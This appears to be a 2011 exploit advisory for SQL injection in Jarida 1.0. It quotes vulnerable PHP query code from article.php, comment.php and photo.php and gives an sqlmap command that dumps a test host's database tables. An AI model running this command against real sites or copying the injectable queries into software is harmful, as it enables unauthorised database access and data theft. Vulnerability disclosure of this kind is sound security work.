Jarida 1.0 SQL Injection

🗓️ 28 Sep 2011 00:00:00Reported by Ptrace SecurityType

packetstorm🔗 packetstormsecurity.com👁 17 Views

Jarida 1.0 SQL Injection, Exploit details, Ptrace Security (Gianni Gnesa), SourceForge link, Tested on CentOS 5.6, Vulnerable code snippet

`# Exploit Title: Jarida 1.0 SQL Injection  
# Date : 26 September 2011  
# Author : Ptrace Security (Gianni Gnesa [gnix])  
# Contact : research[at]ptrace-security[dot]com  
# Software Link: http://sourceforge.net/projects/jarida/  
# Version : 1.0  
# Tested on : CentOS 5.6  
  
  
[01] ./article.php:28: $query = "SELECT article_id FROM tblArticle WHERE article_id = " . $_GET['id'];  
=> ./sqlmap.py -u http://192.168.109.111/jarida_1.0/article.php?id=1 --dump --tables  
  
  
[02] ./comment.php  
  
36 $name = $_POST['name'];  
37 $web = $_POST['web'];  
38 $title = $_POST['title'];  
39 $body = $_POST['body'];  
40 $ip = $_SERVER['REMOTE_ADDR'];  
41 $article_id = $_POST['id'];  
42 $date = time();  
43  
...  
56  
57 switch($_POST['type'])  
58 {  
59 case 'article':  
60 $redirect_url = "./article.php?id=" . $_POST['id'];  
61 $query = "INSERT INTO tblArticleComment (comment_article_id, comment_title, comment_date, comment_body, comment_name, comment_web, comment_ip)  
62 VALUES('$article_id', '$title', '$date', '$body', '$name', '$web', '$ip')";  
63 break;  
64  
65 case 'photo':  
66 $redirect_url = "./photo.php?id=" . $_POST['id'];  
67 $query = "INSERT INTO tblPhotoComment (comment_photo_id, comment_title, comment_date, comment_body, comment_name, comment_web, comment_ip)  
68 VALUES('$article_id', '$title', '$date', '$body', '$name', '$web', '$ip')";  
69 break;  
70 }  
  
  
[03] ./photo.php  
  
39 $query = "SELECT photo_id FROM tblPhoto  
40 WHERE photo_id = " . $_GET['id'];  
  
  
  
`

28 Sep 2011 00:00Current

0.6Low risk

Vulners AI Score0.6